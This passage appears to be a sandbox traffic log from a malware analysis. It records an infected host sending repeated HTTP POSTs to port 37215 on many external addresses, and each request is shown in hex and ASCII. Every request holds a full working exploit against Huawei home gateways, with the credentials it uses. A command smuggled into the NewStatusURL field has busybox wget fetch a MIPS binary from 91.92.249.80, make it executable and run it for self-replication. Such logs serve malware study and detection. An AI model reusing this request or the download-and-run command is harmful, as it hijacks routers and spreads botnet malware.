                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2190192.168.2.2338986131.131.127.24337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635198116 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2191192.168.2.233509841.129.70.5437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635200977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2192192.168.2.234077441.226.209.23237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635211945 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2193192.168.2.2338444210.79.147.9337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635601044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2194192.168.2.233829041.182.57.21037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635627985 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2195192.168.2.235879041.220.47.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635730028 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2196192.168.2.2340344197.6.27.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635874987 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2197192.168.2.2355878197.185.229.21737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635875940 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2198192.168.2.235402841.58.4.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635885000 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2199192.168.2.2352764200.175.99.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:04.635890961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
